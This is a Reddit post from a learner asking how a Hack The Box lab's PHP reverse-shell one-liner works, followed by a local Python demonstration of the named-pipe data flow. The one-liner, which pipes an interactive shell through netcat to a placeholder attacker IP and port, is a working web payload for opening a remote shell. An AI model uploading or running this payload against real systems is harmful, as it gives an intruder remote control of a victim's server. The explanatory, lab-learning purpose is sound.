This is probably super simple, but can someone explain this script from HTB academy for me?
2024-12-13 10:5:31 Author: www.reddit.com Reads: 10

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f"); ?>

This is the script. It's a PHP file to upload to a Nibbleblog program from their first, like, walkthrough box. There may be some errors from copy-pasting, but it's not a matter of correctly entering it; I'm trying to understand how it works.

I understand that it tells the system, via PHP code, to remove anything in /tmp called f (rm /tmp/f), then make a named pipe in /tmp called f (mkfifo /tmp/f), then cat the contents of the pipe /tmp/f (cat /tmp/f). Now pipe the output of that cat command to an interactive shell that will combine the standard output and standard error output into the same "area" (cat /tmp/f | /bin/sh -i 2>&1). This area is netcat, which has a connection on the IP and port (removed and replaced with <IP> just to not post random IPs online) (| nc <IP> <port>). Then netcat writes that input from the shell to /tmp/f and also to the attacker.

What I am confused about is: why is the new data written to /tmp/f from netcat not immediately cat'ed back to the shell? For example, if the victim had a file word.txt and the file contained "word", and the attacker wrote "cat word.txt" to the victim, it would be placed in /tmp/f. It would then cat /tmp/f and pipe to the shell, so the shell would receive "cat word.txt" and it would output "word". This output is written to the attacker, and to /tmp/f. So now I would assume it would re-cat /tmp/f, so the shell would receive "word". The shell would then give an error message saying: "word isn't a valid command, did you mean: blah blah blah try: blah blah blah". I would assume that error would then get written to netcat and /tmp/f. Now re-cat /tmp/f since there is new data, that data being the string "word isn't a valid command, did you mean: blah blah blah try: blah blah blah". That gets entered into the shell, which then gives a parse error. Repeat that whole loop again, and it just keeps adding parse errors, a new line for each string. I assume this because on my shell I would enter a string, copy the whole output, place it back in the shell, and it just grows one "parse error near /n" for every iteration. Clearly this doesn't happen with this script; it works as intended and doesn't fall into this loop, and I don't know why.

Also, clearly I need to read more on netcat, but I am not sure why netcat is handling a two-way conversation (output from the victim shell is going to netcat to the attacker, and the attacker is writing to netcat, which writes to /tmp/f). The way the script is written, I would assume netcat is only writing from the shell to the attacker and /tmp/f; I don't see anywhere that says the attacker can write to netcat to /tmp/f. I'm assuming it's because the script says ALL output from netcat goes to /tmp/f, and netcat is capable of handling multiple inputs (from the shell and the attacker), but again I definitely need to get a better understanding of that program.

Thanks for the help, sorry if this has some super basic answer; I already assume it's super obvious, I just can't seem to grasp it. ChatGPT just keeps saying essentially "it's that way because that's the way it is", which... really doesn't seem like a reasonable answer. It's a computer, not magic.
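The plumbing the question is about, run locally as an added example (this is not part of the original post and not HTB's or Nibbleblog's code): a Python script that builds `cat fifo | sh` on a temporary FIFO and stands a plain local writer in for the remote end of the nc connection, so nothing leaves the machine. It shows the two one-way flows the one-liner relies on: bytes written into the FIFO are read exactly once by cat and handed to sh's stdin, while everything sh prints (stdout and stderr merged by `2>&1`) goes downstream into the next process's stdin, which in the real one-liner is nc's stdin, and never back into the FIFO. That is why no feedback loop occurs. The function name `run_fifo_pipeline`, the temporary path, and the sample commands are my own constructions.

```python
import os
import shlex
import subprocess
import tempfile
import threading


def run_fifo_pipeline(commands):
    """Run `cat <fifo> | sh 2>&1` on a fresh FIFO and return what sh printed.

    Data flow, mirroring the one-liner from the post:
      writer thread (stand-in for nc's stdout, i.e. bytes from the remote side)
        -> FIFO -> cat -> sh's stdin
      sh's stdout + stderr -> this process's pipe (stand-in for nc's stdin)
    Nothing sh prints is ever written into the FIFO, so there is no loop.
    """
    tmpdir = tempfile.mkdtemp()          # constructed scratch dir, not /tmp/f
    fifo = os.path.join(tmpdir, "f")
    os.mkfifo(fifo)                      # same as `mkfifo /tmp/f` in the post

    # Reader side: cat drains the FIFO and sh executes what it receives.
    # sh's output is captured here instead of being handed to nc.
    pipeline = subprocess.Popen(
        ["sh", "-c", f"cat {shlex.quote(fifo)} | sh 2>&1"],
        stdout=subprocess.PIPE,
    )

    # Writer side: this is the only thing that ever writes into the FIFO,
    # exactly like nc's stdout in the one-liner. open() blocks until cat has
    # opened the read end, then each line is consumed once by cat.
    def writer():
        with open(fifo, "w") as w:
            for cmd in commands:
                w.write(cmd + "\n")
        # Closing the write end gives cat EOF, so cat and then sh exit.

    t = threading.Thread(target=writer)
    t.start()
    out, _ = pipeline.communicate()      # waits for sh to finish and exit
    t.join()

    os.remove(fifo)
    os.rmdir(tmpdir)
    return out.decode()


def output_never_reenters_fifo(commands):
    """True when every line sh printed came from a command we supplied, and
    none of sh's own output was executed as a command (the loop the post
    worries about would produce 'not found' errors for the echoed words)."""
    out = run_fifo_pipeline(commands)
    return "not found" not in out and "word:" not in out


if __name__ == "__main__":
    # Constructed sample session: the "remote side" sends two commands.
    print(run_fifo_pipeline(["echo word", "echo done"]), end="")
```

If the FIFO really did feed sh's output back into itself, the second line would be `word` executed as a command and sh would print a "not found" error for it; the `output_never_reenters_fifo` check confirms that does not happen. Note also that the FIFO is a stream, not a file: once cat has read a byte it is gone, which is the other half of why there is nothing to "re-cat".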


Source: https://www.reddit.com/r/HowToHack/comments/1hd1pog/this_is_probably_super_simple_but_can_someone/